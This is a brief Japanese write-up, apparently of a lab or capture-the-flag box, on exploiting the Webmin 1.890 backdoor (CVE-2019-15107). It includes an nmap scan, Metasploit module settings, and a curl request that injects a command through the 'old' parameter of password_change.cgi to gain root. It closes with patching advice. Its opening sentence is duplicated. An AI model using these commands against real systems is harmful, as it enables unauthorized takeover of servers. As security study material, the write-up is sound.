
研究目的: Webminバージョン1.890(CVE-2019-15107)におけるリモートコード実行(RCE)脆弱性の包括的な分析と悪用に成功し、最終的に対象システムの完全な制御を獲得すること。
研究目的: Webmin バージョン 1.890 におけるリモートコード実行 (RCE) 脆弱性 (CVE-2019-15107) の包括的な分析と正常なエクスプロイトを実施し、最終的にターゲットシステムの完全な制御を獲得することを目的とする。
方法論:
初期偵察:
Nmap を使用したネットワークスキャンの実行:
bash nmap -sV -sC -A -p- 10.201.105.185 ポート 10000 で稼働する Webmin 1.890 サービスを特定
脆弱性分析:
password_change.cgi の脆弱性メカニズムを調査
認証なしでの任意コマンド実行の可能性を確認
エクスプロイト:
2 つの攻撃ベクトルを実装:
Metasploit フレームワークの使用:
bash use exploit/linux/http/webmin_backdoor set RHOSTS 10.201.105.185 set LHOST tun0 exploit curl による手動エクスプロイト:
bash curl -k "https://10.201.105.185:10000/password_change.cgi" -d "user=root&pam=&expired=2&old=test|id&new1=test&new2=test" ポストエクスプロイト:
対話的な root シェルを取得
ファイルシステム分析を実施
フラグファイルを発見:
bash /home/dark/user.txt /root/root.txt 発見事項:
CVE-2019-15107 脆弱性のエクスプロイトに成功
システム上で完全な root 権限を獲得
タイムリーなソフトウェア更新の重要性を実証
技術的結論:
脆弱性により "old" パラメータインジェクションを介した任意コマンド実行が可能
認証チェックの欠如が特に危険
バージョン 1.890 は後のリリースでパッチが適用されたバックドアを含む
セキュリティ推奨事項:
現在の Webmin バージョンへの即時アップグレード
管理パネルへのアクセスを IP で制限
Web アプリケーションの定期的なセキュリティ監査
さらなる研究の方向性:
他の Webmin 脆弱性の分析
Metasploit を使用しないカスタムエクスプロイトの開発
侵害されたシステムにおける永続化手法の調査
本ケーススタディは、タイムリーなシステム更新の極めて重要性と、デプロイ済みソフトウェアにおける継続的な脆弱性監視の必要性を示している。この研究は、基本的なセキュリティ原則を強調すると同時に、現代の Web アプリケーションエクスプロイト技術に関する実践的な知見を提供する。